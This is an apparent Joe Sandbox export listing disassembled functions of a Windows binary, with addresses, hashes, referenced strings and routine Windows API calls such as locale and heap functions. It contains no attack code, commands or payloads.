Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Wcsftime_invalid_parameter_noinfo
String ID:
API String ID: 3560770000-0
Opcode ID: 6099c44434e6e76cb357717c529ef490954576249cbe793bd0988b0d8b47c5f7
Instruction ID: f337152af82c8bb15cb5b5bde4434e01998ec4526fd608720084576b58599256
Opcode Fuzzy Hash: 6099c44434e6e76cb357717c529ef490954576249cbe793bd0988b0d8b47c5f7
Instruction Fuzzy Hash: B991A332311E5482EB66DE26D9957AD23A2F788BD8F248A15FF5E57BE5CF38C4418300

Function 000000014005A708 Relevance: 2.9, Strings: 2, Instructions: 354COMMONLIBRARYCODE

Download Yara Rule

Strings

utf-8, xrefs: 000000014005A954
utf8, xrefs: 000000014005A940

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: NameTranslate$CodePageValid_invalid_parameter_noinfotry_get_function
String ID: utf-8$utf8
API String ID: 1050640288-782216586
Opcode ID: 1fb045b364305556e0ae84c1475b26f4ae516d308f6a374d7eca90d235d8a815
Instruction ID: 696ac664cacd1213ef16a92446948e930b37bc5317dc11f44bf9a26b50bd6c82
Opcode Fuzzy Hash: 1fb045b364305556e0ae84c1475b26f4ae516d308f6a374d7eca90d235d8a815
Instruction Fuzzy Hash: 3AD1D03270578546FB66DB73A911BEA26A2F78E7C4F108126BF4A43AA5EF3DC501C700

Function 0000000140056DE0 Relevance: 1.9, APIs: 1, Instructions: 370COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 0000000140056F28

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 1465f92e1c7d877cd234be4bb660ee287b81406a0f9a09ae93ee2e7856a58a69
Instruction ID: d3b848f95f4edb155450d9be03eda250befee91bdb88f8fdc3ce34d89b80ffb0
Opcode Fuzzy Hash: 1465f92e1c7d877cd234be4bb660ee287b81406a0f9a09ae93ee2e7856a58a69
Instruction Fuzzy Hash: 40029032A08BC086E752CF3AA4457ED77A4F76C788F159225EF8C87662EB35D295D300

Function 000000014006AA60 Relevance: 1.8, APIs: 1, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 723f3d51d1edc674417a9051a3abd01236e959c004aa129216d83321ede981ff
Instruction ID: 31d5b4818c35ac7573c0aa531254304dcfaac4ceb9e9dacf04aacb6b13039e2d
Opcode Fuzzy Hash: 723f3d51d1edc674417a9051a3abd01236e959c004aa129216d83321ede981ff
Instruction Fuzzy Hash: D4E19132700B8085E721DBA2E8417EE37A5F7997C8F514A26AF9D577A2EF38C245C300

Function 00000001400105F0 Relevance: 1.6, Strings: 1, Instructions: 352COMMON

Download Yara Rule

Strings

debug.log, xrefs: 00000001400105F4

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: debug.log
API String ID: 118556049-600467936
Opcode ID: 9f88b5320083b547f4d79085f1ed3589777388413d8cb1a500e0831cd0b64cd2
Instruction ID: e449e2c113fdac86e77c90bc08ebe3ad186dee37499601398f7c837e86e80b67
Opcode Fuzzy Hash: 9f88b5320083b547f4d79085f1ed3589777388413d8cb1a500e0831cd0b64cd2
Instruction Fuzzy Hash: E0F17353E24BD482E711CB29DA403F86760F7ADB98F15A314EFAA177E2DB75A1C58300

Function 000000014006D130 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140065CC4: GetLastError.KERNEL32 ref: 0000000140065CCE
Part of subcall function 0000000140065CC4: SetLastError.KERNEL32 ref: 0000000140065D67

GetLocaleInfoW.KERNEL32 ref: 000000014006D198

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 5f56685b0526095b9bc3278e83920747f1309efc21250049e4bfd7eb7a8bf865
Instruction ID: 50af53b2eaecb7610bb52603acb02ea65fd67b162cf9bc848917e53e71398f4f
Opcode Fuzzy Hash: 5f56685b0526095b9bc3278e83920747f1309efc21250049e4bfd7eb7a8bf865
Instruction Fuzzy Hash: F9319E32B0078186EB25DB23E8513DA73A2F79C7C4F648926AB9E873A5DF38D554C700

Function 000000014006CD78 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140065CC4: GetLastError.KERNEL32 ref: 0000000140065CCE
Part of subcall function 0000000140065CC4: SetLastError.KERNEL32 ref: 0000000140065D67

EnumSystemLocalesW.KERNEL32(?,?,?,000000014006CB7B,00000001,?,?,00000000,?,00000000,?,000000014005A8B3), ref: 000000014006CE16

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 9a9b86ae045ea590e12959a65bd7660a40def39304c477db24fcb0aca4b5069f
Instruction ID: d229a53c4054faa1c360d7f38ea786b59e6aa0d84f0acf2ce23eb4a9cf42afb5
Opcode Fuzzy Hash: 9a9b86ae045ea590e12959a65bd7660a40def39304c477db24fcb0aca4b5069f
Instruction Fuzzy Hash: 201106736146448AEB168F16D840BE87BA2F358FE4F648525E72A433E0DA75C5D1C780

Function 000000014006D240 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140065CC4: GetLastError.KERNEL32 ref: 0000000140065CCE
Part of subcall function 0000000140065CC4: SetLastError.KERNEL32 ref: 0000000140065D67

GetLocaleInfoW.KERNEL32 ref: 000000014006D2AD

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 544a39aab658bca08b716d5eaaa9965300620b2b0b0d707e0e427d9eb9a7cf6d
Instruction ID: f2f90e2056ca4ad8889724bf7bda1c7f30dccefc6d6855b437b21378d123ad14
Opcode Fuzzy Hash: 544a39aab658bca08b716d5eaaa9965300620b2b0b0d707e0e427d9eb9a7cf6d
Instruction Fuzzy Hash: B021CD326007818AEB22DF22E8413D933A6F38CBC4F548922EB8C87369CF38D955C700

Function 000000014006D3D8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140065CC4: GetLastError.KERNEL32 ref: 0000000140065CCE
Part of subcall function 0000000140065CC4: SetLastError.KERNEL32 ref: 0000000140065D67

GetLocaleInfoW.KERNEL32(?,?,?,000000014006D054), ref: 000000014006D40F

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b154d25a9970185832376945fdb8dedb252e4ea3908f347881b228b13451a57b
Instruction ID: dadf79e630ea3aafc828d50efb53125ef06d2c7f70d811ec6aae07a991af3804
Opcode Fuzzy Hash: b154d25a9970185832376945fdb8dedb252e4ea3908f347881b228b13451a57b
Instruction Fuzzy Hash: B0112932A1469083EB659B13A8407ED32A2E7487E4F204A23FB6E477D5DE35DC818300

Function 0000000140067250 Relevance: 1.5, APIs: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,00000001400669E5,?,?,?,?,?,?,?,?,00000000,000000014006C792), ref: 00000001400672AA

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 5296ae4e9947cb6113883109101ac9d67b957933c1aa160af86d25ef6cc226c2
Instruction ID: 9995752cd31c15cffb7fb0ed260c735d0683d900ba333e69d9fbe8ca09f401fa
Opcode Fuzzy Hash: 5296ae4e9947cb6113883109101ac9d67b957933c1aa160af86d25ef6cc226c2
Instruction Fuzzy Hash: 74018B72310A8082E705CB26E8907D973A2E78DBC0F048126FB4997779DF39C8958780

Function 000000014006D098 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140065CC4: GetLastError.KERNEL32 ref: 0000000140065CCE
Part of subcall function 0000000140065CC4: SetLastError.KERNEL32 ref: 0000000140065D67

EnumSystemLocalesW.KERNEL32(?,?,?,000000014006CB37,00000001,?,?,00000000,?,00000000,?,000000014005A8B3), ref: 000000014006D118

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 528c77f0b3671bca43ce3561062c2a9f7a7a94d2ba3654a04883203dc7c1d871
Instruction ID: 80c9a77017418edf87f76a263e9228bd7b3a64be108e635382fd995adaa1de5e
Opcode Fuzzy Hash: 528c77f0b3671bca43ce3561062c2a9f7a7a94d2ba3654a04883203dc7c1d871
Instruction Fuzzy Hash: 4A01D472B0428086FB225F17EC407E976E7E758BE4F619623E7684B2E4DBB5C4868700

Function 0000000140073710 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 0000000140073787

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 0895f604de9e1352b330fd5d46479716c10a6fdd00f0ffbd5c77a393978965cb
Instruction ID: b054ba9429e8c1366a571633805ea3642a9decf7001bc3cc739311a1cc56d263
Opcode Fuzzy Hash: 0895f604de9e1352b330fd5d46479716c10a6fdd00f0ffbd5c77a393978965cb
Instruction Fuzzy Hash: 99114C76718B8482E721CB1AE54939DB7A0B39CBE8F244315EB68477A5CB78C484C740

Function 0000000140018F20 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

A_FIELDS, xrefs: 0000000140018F72

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID: A_FIELDS
API String ID: 0-1784087017
Opcode ID: 9f6b50aa83d420f8ec8389738c2a568c5ed92497b1e80d319391278f594e15e8
Instruction ID: 67cc323864e0daf2990dbd63950c8b8b368c4d2434c961aadd4be3699b974399
Opcode Fuzzy Hash: 9f6b50aa83d420f8ec8389738c2a568c5ed92497b1e80d319391278f594e15e8
Instruction Fuzzy Hash: 08817FB2300A4455FE56DB13E5543EA63A1FB4CBD4F498421EF4E4B3AAEE3AC485C300

Function 0000000140043F30 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

Windows.FilesystemError., xrefs: 0000000140043F34

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID: Windows.FilesystemError.
API String ID: 0-4117249092
Opcode ID: 808f50be3dec0d163afe12877ad30361deeffb4b8e85445b672315201c4bfb11
Instruction ID: e2df4f8f6e7dd890e03cf2a2b13e2801816671f1fd000b85eed820e515cee10f
Opcode Fuzzy Hash: 808f50be3dec0d163afe12877ad30361deeffb4b8e85445b672315201c4bfb11
Instruction Fuzzy Hash: 2B61B6736186848BE735CF2AE44139ABBA0E369384F454139FB8EC7BA6D63CD545CB04

Function 0000000140059550 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

0, xrefs: 00000001400596F2

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 5bfe587feeb1fb6e3091c88f051268258f3dfa5c784db2f10b525e9c65af2234
Instruction ID: 5310649cfdface23e93887236ea4d39293a0ac1bc6d86946d050aed878a78e34
Opcode Fuzzy Hash: 5bfe587feeb1fb6e3091c88f051268258f3dfa5c784db2f10b525e9c65af2234
Instruction Fuzzy Hash: 2661F23131424446FB7BCA2B90407EE6795E349BC4F581916FF419B6F9CA3BC84ACB41

Function 00000001400673AC Relevance: 1.4, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000000140067451

Part of subcall function 0000000140067334: HeapAlloc.KERNEL32(?,?,00000000,0000000140065E86,?,?,?,000000014005C2B1,?,?,?,?,000000014006560A,?,?,00000000), ref: 0000000140067389

Part of subcall function 0000000140065AC4: HeapFree.KERNEL32(?,?,?,000000014006B91B,?,?,?,000000014006B4C3,?,?,?,000000014006BE7C,?,?,?,000000014006BD87), ref: 0000000140065ADA
Part of subcall function 0000000140065AC4: GetLastError.KERNEL32(?,?,?,000000014006B91B,?,?,?,000000014006B4C3,?,?,?,000000014006BE7C,?,?,?,000000014006BD87), ref: 0000000140065AEC

Part of subcall function 0000000140071740: _invalid_parameter_noinfo.LIBCMT ref: 000000014007176E

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
String ID:
API String ID: 916656526-0
Opcode ID: 1e698d6d9343d336d4aa42a1e67bf223e7cf298092a11fb2f3380314c94060d1
Instruction ID: de5fdc9c6b0ab25439f8aa1901bef92dedeb82ff17867c6bad4d78a7f7ba5754
Opcode Fuzzy Hash: 1e698d6d9343d336d4aa42a1e67bf223e7cf298092a11fb2f3380314c94060d1
Instruction Fuzzy Hash: 6241D23230168141FA329B277C51BEAA6D2BB9DBD4F645925BF4E47BA6EE3CC4018600

Function 0000000140034FF0 Relevance: .9, Instructions: 880COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e2e68a9163595ab3a64b9907a75528ee9fb90b4997f430e39973d8319001739
Instruction ID: 2e9ce7e3192490536cf35ebd729aeb1246bda587722700447582f9d23fb7a0f1
Opcode Fuzzy Hash: 8e2e68a9163595ab3a64b9907a75528ee9fb90b4997f430e39973d8319001739
Instruction Fuzzy Hash: F8827972614BC486DB22DF1AE4843EEB765F788BC5F548226EB8D47B68DB38D145CB00

